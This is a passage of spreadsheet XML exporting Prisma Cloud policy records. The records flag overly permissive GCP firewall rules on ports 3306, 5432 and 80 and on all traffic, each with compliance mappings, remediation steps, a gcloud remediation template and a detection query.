          <t>This policy identifies GCP Firewall rules which allow all inbound traffic on MySQL DB port (3306). Allowing access from arbitrary IP addresses to this port increases the attack surface of your network. It is recommended that the MySQL DB port (3306) should be allowed to specific IP addresses.</t>
        </is>
      </c>
      <c r="X2716"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 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-compute-firewall-ingress-does-not-allow-unrestricted-mysql-access
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-compute-firewall-ingress-does-not-allow-unrestricted-mysql-access</t>
        </is>
      </c>
      <c r="Y2716" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'compute.firewalls.update' and 'compute.networks.updatePolicy' permission. Successful execution will disable this firewall rule blocking internet traffic to MySQL DB port (3306).",
'impact': 'Disable GCP Firewall rule which allows all traffic on MySQL DB port (3306)',
'cliScriptTemplate': 'gcloud compute --project=$account firewall-rules update $resourceName --disabled'</t>
        </is>
      </c>
      <c r="Z2716"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_Port.inRange(3306,3306) or (ports does not exist and (IPProtocol contains tcp or IPProtocol contains udp)))] exists
{"category":"Networking","resourceTypes":["google_compute_firewall"]}</t>
        </is>
      </c>
      <c r="AA2716" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2716" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2716" t="inlineStr">
        <is>
          <t>PC-GCP-VPC-75-CKV_GCP_88</t>
        </is>
      </c>
      <c r="AD2716" t="b">
        <v>1</v>
      </c>
      <c r="AE2716" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2716" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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kfirdaus-alert-rule-test - Notifications:email, AccountGroups:PCS AWS Accounts;,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6" t="inlineStr">
        <is>
          <t>1171a9b9-9648-405a-8e03-83e5025e81d3</t>
        </is>
      </c>
      <c r="AI2716" t="inlineStr">
        <is>
          <t>1171a9b9-9648-405a-8e03-83e5025e81d3</t>
        </is>
      </c>
      <c r="AJ2716" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2716" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2717">
      <c r="A2717" t="inlineStr">
        <is>
          <t>ISO 27001:2013, ISO/IEC 27002:2013, ISO/IEC 27001:2022, CSA CCM v.4.0.1, CSA CCM v.4.0.1, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev4, GDPR, NIST 800-53 Rev 5, NIST CSF, NIST CSF v2.0, NYDFS 23 CRR-NY 500.0, HITRUST v.9.4.2 [Deprecated], kashan ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), New Zealand Information Security Manual (NZISM v3.4), Risk Management in Technology (RMiT), ISO/IEC 27002:2013, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, ISO/IEC 27017:2015, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, NIST 800-53 Rev 5, CSA CCM v.4.0.1, PCI DSS v4.0, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CIS Controls v8.1, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev4, NIST 800-53 Rev 5, Copy of ACSC Information Security Manual (ISM)-clone, HIPAA, CIS Controls v7.1, NIST CSF, CSA CCM v.4.0.1, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CDC NIST 800-53 Rev4, MITRE ATT&amp;CK v8.2 [Deprecated], NIST 800-53 Rev 5, PCI DSS v3.2.1, ISO/IEC 27002:2013, NIST 800-53 Rev4, CIS Controls v7.1, ISO 27001:2013, ISO/IEC 27017:2015, NIST SP 800-172, CSA CCM v.4.0.1, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, Fedramp (Moderate), Sarbanes Oxley Act (SOX), MITRE ATT&amp;CK v10.0 [Deprecated], Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, ISO/IEC 27002:2013, NIST CSF, CDC NIST 800-53 Rev4, CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, HITRUST v.9.4.2 [Deprecated], CSA CCM v.4.0.1, ISO/IEC 27018:2019, Microsoft Cloud Security Benchmark v1, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, PCI DSS v4.0, ISO/IEC 27017:2015, SOC 2, kashan ACSC Information Security Manual (ISM), ISO 27001:2013, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Demo_Daryl ACSC Information Security Manual (ISM), NIST CSF, MITRE ATT&amp;CK v6.3 [Deprecated], NIST 800-53 Rev4, Matt's ATT&amp;ACK, CSA CCM v.4.0.1, SOC 2,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SOC 2, Copy of New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST CSF, CSA CCM v.4.0.1, RBI Baseline Cyber Security and Resilience Requirements, TX-RAMP Level 1, NIST CSF, NIST CSF, FFIEC, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, NIST 800-53 Rev4, ISO/IEC 27002:2013, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO/IEC 27002:2013, CCPA 2018, PIPEDA, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ISO/IEC 27002:2013, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, ISO/IEC 27002:2013, DORA, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27001:2022, NIST CSF, CSA CCM v.4.0.1, NIST SP 800-171 Revision 2, ISO/IEC 27018:2019, PCI DSS v4.0, CSA CCM v.4.0.1, CRI Profile v2.0</t>
        </is>
      </c>
      <c r="B2717" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2717" s="2" t="inlineStr"/>
      <c r="D2717" t="inlineStr"/>
      <c r="E2717" t="inlineStr"/>
      <c r="F2717" t="inlineStr"/>
      <c r="G2717" t="b">
        <v>1</v>
      </c>
      <c r="H27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kfirdaus-alert-rule-test,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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2717" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall</t>
        </is>
      </c>
      <c r="K2717" t="inlineStr">
        <is>
          <t>GCP Firewall with Inbound rule overly permissive to All Traffic</t>
        </is>
      </c>
      <c r="L2717" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2717" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2717" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2717" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2717" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2717" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2717" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2717" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2717" t="b">
        <v>1</v>
      </c>
      <c r="U2717" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2717" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall-rules-list</t>
        </is>
      </c>
      <c r="W2717" t="inlineStr">
        <is>
          <t>This policy identifies GCP Firewall rules which allows inbound traffic on all protocols from public internet. Doing so, may allow a bad actor to brute force their way into the system and potentially get access to the entire network.</t>
        </is>
      </c>
      <c r="X2717" t="inlineStr">
        <is>
          <t>If the Firewall rule reported indeed need to restrict all traffic, follow the instructions below:
1. Login to GCP Console
2. Go to VPC Network
3. Go to the Firewall rules
4. Click on the reported Firewall rule
5. Click Edit
6. Modify Source IP ranges to specific IP and modify Protocols and ports to specific protocol and port
7. Click Save 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-access-to-all-ports
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-access-to-all-ports</t>
        </is>
      </c>
      <c r="Y2717" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'compute.firewalls.update' and 'compute.networks.updatePolicy' permission. Successful execution will disable this firewall rule blocking overly permissive internet traffic.",
'impact': 'Disable GCP Firewall configure with Inbound rule overly permissive to All Traffic',
'cliScriptTemplate': 'gcloud compute --project=$account firewall-rules update $resourceName --disabled'</t>
        </is>
      </c>
      <c r="Z2717" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name='gcloud-compute-firewall-rules-list' AND json.rule= disabled is false and direction equals INGRESS and (sourceRanges[*] equals ::0 or sourceRanges[*] equals 0.0.0.0 or sourceRanges[*] equals 0.0.0.0/0 or sourceRanges[*] equals ::/0 or sourceRanges[*] equals ::) and allowed[?any(IPProtocol equals "all")] exists
{"category":"Networking","resourceTypes":["google_compute_firewall"]}</t>
        </is>
      </c>
      <c r="AA2717" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2717" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2717" t="inlineStr">
        <is>
          <t>PC-GCP-VPC-221-CKV2_GCP_12</t>
        </is>
      </c>
      <c r="AD2717" t="b">
        <v>1</v>
      </c>
      <c r="AE2717" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2717" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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kfirdaus-alert-rule-test - Notifications:email, AccountGroups:PCS AWS Accounts;,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7" t="inlineStr">
        <is>
          <t>ff6a9cca-8bc5-4a72-9235-ec7b65c547d5</t>
        </is>
      </c>
      <c r="AI2717" t="inlineStr">
        <is>
          <t>33142dd4-733b-44d1-8320-8ccacf39adf9</t>
        </is>
      </c>
      <c r="AJ2717" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2717" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2718">
      <c r="A2718" t="inlineStr">
        <is>
          <t>ISO 27001:2013, CSA CCM v3.0.1, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), PCI DSS v4.0,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PCI DSS v4.0, PCI DSS v4.0, GDPR, APRA (CPS 234) Information Security, kfirdaus AWS Account-CS, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, NIST SP 800-171 Revision 2, NIST CSF v2.0, NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, PCI DSS v4.0, NIST 800-53 Rev 5, PCI DSS v3.2.1, Telecommunications Security Act - TSA, CSA CCM v.4.0.6, CIS Controls v7.1, SOC 2, ISO 27001:2013, NIST SP 800-172, PCI DSS v4.0, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), ISO 27002:2022, MPAA Content Protection Best Practices, NIST CSF, CDC NIST 800-53 Rev4, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0, Risk Management in Technology (RMiT), kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, PCI DSS v4.0, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, ISO/IEC 27001:2022, MITRE ATT&amp;CK v6.3 [Deprecated],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PCI DSS v4.0, Copy of CIS Controls v8, CSA CCM v3.0.1, NIST SP 800-171 Revision 3, ITSG-33, Copy of New Zealand Information Security Manual (NZISM v3.4), Cybersecurity Maturity Model Certification (CMMC) v.1.02, CRI Profile v2.0, RBI Baseline Cyber Security and Resilience Requirements, GDPR, PCI DSS v4.0, PCI DSS v4.0,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PCI DSS v4.0, CSA CCM v3.0.1, NIST SP 800-171 Revision 2, HITRUST CSF v9.3 [Deprecated]</t>
        </is>
      </c>
      <c r="B2718" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2718" s="2" t="inlineStr"/>
      <c r="D2718" t="inlineStr"/>
      <c r="E2718" t="inlineStr"/>
      <c r="F2718" t="inlineStr"/>
      <c r="G2718" t="b">
        <v>1</v>
      </c>
      <c r="H27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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2718" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall</t>
        </is>
      </c>
      <c r="K2718" t="inlineStr">
        <is>
          <t>GCP Firewall rule allows all traffic on PostgreSQL port (5432)</t>
        </is>
      </c>
      <c r="L2718" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2718" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2718" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2718" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2718" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2718" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2718" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2718" t="inlineStr">
        <is>
          <t>GCP</t>
        </is>
      </c>
      <c r="T2718" t="b">
        <v>1</v>
      </c>
      <c r="U2718" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2718" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall-rules-list</t>
        </is>
      </c>
      <c r="W2718" t="inlineStr">
        <is>
          <t>This policy identifies GCP Firewall rules which allow all inbound traffic on PostgreSQL port (5432). Allowing access from arbitrary IP addresses to this port increases the attack surface of your network. It is recommended that the PostgreSQL port (5432) should be allowed to specific IP addresses.</t>
        </is>
      </c>
      <c r="X2718"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18" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'compute.firewalls.update' and 'compute.networks.updatePolicy' permission. Successful execution will disable this firewall rule blocking internet traffic to PostgreSQL port (5432).",
'impact': 'Disable GCP Firewall rule which allows all traffic on PostgreSQL port (5432)',
'cliScriptTemplate': 'gcloud compute --project=$account firewall-rules update $resourceName --disabled'</t>
        </is>
      </c>
      <c r="Z2718"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_Port.inRange(5432,5432) or (ports does not exist and (IPProtocol contains tcp or IPProtocol contains udp)))] exists</t>
        </is>
      </c>
      <c r="AA2718" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2718" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2718" t="inlineStr">
        <is>
          <t>PC-GCP-VPC-68</t>
        </is>
      </c>
      <c r="AD2718" t="b">
        <v>1</v>
      </c>
      <c r="AE2718" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2718" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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8" t="inlineStr">
        <is>
          <t>b1a3c396-2e03-4050-b7b4-6cf8a7ab5f9b</t>
        </is>
      </c>
      <c r="AI2718" t="inlineStr">
        <is>
          <t>b1a3c396-2e03-4050-b7b4-6cf8a7ab5f9b</t>
        </is>
      </c>
      <c r="AJ2718" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2718" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2719">
      <c r="A2719" t="inlineStr">
        <is>
          <t>ISO 27001:2013, CSA CCM v3.0.1, ISO/IEC 27001:2022, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, NIST 800-53 Rev4, kashan ACSC Information Security Manual (ISM), HIPAA, ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), New Zealand Information Security Manual (NZISM v3.4), Risk Management in Technology (RMiT), kfirdaus AWS Account-CS, MITRE ATT&amp;CK v8.2 [Deprecated], CDC NIST 800-53 Rev4, NIST SP 800-171 Revision 3, GDPR, APRA (CPS 234) Information Security, kfirdaus AWS Account-CS, PCI DSS v4.0, CIS Controls v8.1, NIST SP 800-171 Revision 2, NIST CSF v2.0, NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone, SOC 2, CIS Controls v7.1, NIST 800-53 Rev 5, PCI DSS v3.2.1, Telecommunications Security Act - TSA, CSA CCM v.4.0.6, CIS Controls v7.1, SOC 2, ISO 27001:2013, NIST SP 800-172, ISO/IEC 27001:2022, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), ISO 27002:2022, DORA, MPAA Content Protection Best Practices, TX-RAMP Level 2, NIST CSF, CDC NIST 800-53 Rev4, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0,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SOC 2, RBI Baseline Cyber Security and Resilience Requirements, GDPR, SOC 2, FFIEC, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), CSA CCM v3.0.1, kashan ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, CCPA 2018, PIPEDA, NIST CSF, Brazilian Data Protection Law (LGPD), Copy of ACSC Information Security Manual (ISM)-clone, TX-RAMP Level 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CSA CCM v3.0.1, NIST SP 800-171 Revision 2, PCI DSS v4.0, HITRUST CSF v9.3 [Deprecated]</t>
        </is>
      </c>
      <c r="B2719" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2719" s="2" t="inlineStr"/>
      <c r="D2719" t="inlineStr"/>
      <c r="E2719" t="inlineStr"/>
      <c r="F2719" t="inlineStr"/>
      <c r="G2719" t="b">
        <v>1</v>
      </c>
      <c r="H27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19" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2719" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall</t>
        </is>
      </c>
      <c r="K2719" t="inlineStr">
        <is>
          <t>GCP Firewall rule allows all traffic on HTTP port (80)</t>
        </is>
      </c>
      <c r="L2719" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2719" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2719" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2719" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2719" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2719" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2719" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2719" t="inlineStr">
        <is>
          <t>GCP,Policy Status Review</t>
        </is>
      </c>
      <c r="T2719" t="b">
        <v>1</v>
      </c>
      <c r="U2719" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2719" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall-rules-list</t>
        </is>
      </c>
      <c r="W2719" t="inlineStr">
        <is>
          <t>This policy identifies GCP Firewall rules which allow all inbound traffic on HTTP port (80). Allowing access from arbitrary IP addresses to this port increases the attack surface of your network. It is recommended that the HTTP port (80) should be allowed to specific IP addresses.</t>
        </is>
      </c>
      <c r="X2719"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 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-http-port-80-access
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-http-port-80-access</t>
        </is>
      </c>
      <c r="Y2719" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'compute.firewalls.update' and 'compute.networks.updatePolicy' permission. Successful execution will disable this firewall rule blocking internet traffic to HTTP port (80).",
'impact': 'Disable GCP Firewall rule which allows all traffic on HTTP port (80)',
'cliScriptTemplate': 'gcloud compute --project=$account firewall-rules update $resourceName --disabled'</t>
        </is>
      </c>
      <c r="Z2719" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name='gcloud-compute-firewall-rules-list' AND json.rule= disabled is false and direction equals INGRESS and (sourceRanges[*] equals ::0 or sourceRanges[*] equals 0.0.0.0 or sourceRanges[*] equals 0.0.0.0/0 or sourceRanges[*] equals ::/0 or sourceRanges[*] equals ::) and allowed[?any(ports contains _Port.inRange(80,80) or (ports does not exist and (IPProtocol contains tcp or IPProtocol contains udp)))] exists
{"category":"Networking","resourceTypes":["google_compute_firewall"]}</t>
        </is>
      </c>
      <c r="AA2719" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2719" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2719" t="inlineStr">
        <is>
          <t>PC-GCP-VPC-77-CKV_GCP_106</t>
        </is>
      </c>
      <c r="AD2719" t="b">
        <v>1</v>
      </c>
      <c r="AE2719" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2719" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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19" t="inlineStr">
        <is>
          <t>9f6d22f9-873a-4a71-91a8-41a82e4c9314</t>
        </is>
      </c>
      <c r="AI2719" t="inlineStr">
        <is>
          <t>9f6d22f9-873a-4a71-91a8-41a82e4c9314</t>
        </is>
      </c>
      <c r="AJ2719" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2719" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2720">
      <c r="A2720" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST 800-53 Rev4, GDPR, NIST 800-53 Rev 5, NIST CSF v2.0, HITRUST v.9.4.2 [Deprecated], kashan ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27017:2015, kfirdaus AWS Account-CS, CDC NIST 800-53 Rev4, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Fedramp (Moderate), kfirdaus AWS Account-CS, PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, NIST 800-53 Rev4, ISO/IEC 27017:2015, NIST 800-53 Rev 5, ISO/IEC 27017:2015, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, CDC NIST 800-53 Rev4, MITRE ATT&amp;CK v8.2 [Deprecated], NIST 800-53 Rev 5, PCI DSS v3.2.1, NIST 800-53 Rev4, CIS Controls v7.1, NIST CSF, NIST SP 800-172, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, Fedramp (Moderate), CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Sarbanes Oxley Act (SOX), CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v4.0, CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), MITRE ATT&amp;CK v6.3 [Deprecated], NIST 800-53 Rev4, NIST 800-53 Rev 5, ISO/IEC 27002:2013, PCI DSS v4.0, NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2022.2.1, Fedramp (Moderate), APRA (CPS 234) Information Security, CIS Controls v8, Copy of CIS Controls v8, NIST SP 800-171 Revision 3, Copy of New Zealand Information Security Manual (NZISM v3.4), Cybersecurity Maturity Model Certification (CMMC) v.1.02, RBI Baseline Cyber Security and Resilience Requirements, FFIEC, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), kashan ACSC Information Security Manual (ISM), NIST 800-53 Rev4, ISO/IEC 27002:2013, CCPA 2018, PIPEDA, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-171 Revision 2, CSA CCM v.4.0.1, PCI DSS v4.0, CSA CCM v.4.0.1, ISO/IEC 27018:2019, CRI Profile v2.0</t>
        </is>
      </c>
      <c r="B2720" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2720" s="2" t="inlineStr"/>
      <c r="D2720" t="inlineStr"/>
      <c r="E2720" t="inlineStr"/>
      <c r="F2720" t="inlineStr"/>
      <c r="G2720" t="b">
        <v>1</v>
      </c>
      <c r="H27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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2720" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall</t>
        </is>
      </c>
      <c r="K2720" t="inlineStr">
        <is>
          <t>GCP Firewall rule allows inbound traffic from anywhere with no specific target set</t>
        </is>
      </c>
      <c r="L2720" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2720" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2720" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2720" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2720" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2720" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2720" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2720" t="inlineStr"/>
      <c r="T2720" t="b">
        <v>1</v>
      </c>
      <c r="U2720" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2720" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall-rules-list</t>
        </is>
      </c>
      <c r="W2720" t="inlineStr">
        <is>
          <t>This policy identifies GCP Firewall rules which allow inbound traffic from anywhere with no target filtering. 
The default target is all instances in the network. The use of target tags or target service accounts allows the rule to apply to select instances. Not using any firewall rule filtering may allow a bad actor to brute force their way into the system and potentially get access to the entire network.</t>
        </is>
      </c>
      <c r="X2720" t="inlineStr">
        <is>
          <t>Follow the instructions below to restrict the default target parameter (all instances in the network):
1. Login to GCP Console.
2. Go to VPC Network.
3. Go to the Firewall rules.
4. Click on each Firewall rule reported.
5. Click Edit.
6. Change the Targets field from 'All instances in the network' to 'Specified target tags' or 'Specified service account'.
7. Type the target tag/target service account into the Target tags/Target service account field respectively.
8. Review Source IP ranges and change to specific IP ranges if traffic is not required to be allowed from anywhere.
9. Click Save.
Reference:
https://cloud.google.com/vpc/docs/add-remove-network-tags</t>
        </is>
      </c>
      <c r="Y2720" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'compute.firewalls.update' and 'compute.networks.updatePolicy' permission. Successful execution will disable firewall rule which allows inbound traffic from anywhere with no specific target set.",
'impact': 'Disable GCP Firewall rule which allows inbound traffic from anywhere with no specific target set',
'cliScriptTemplate': 'gcloud compute --project=$account firewall-rules update $resourceName --disabled'</t>
        </is>
      </c>
      <c r="Z2720" t="inlineStr">
        <is>
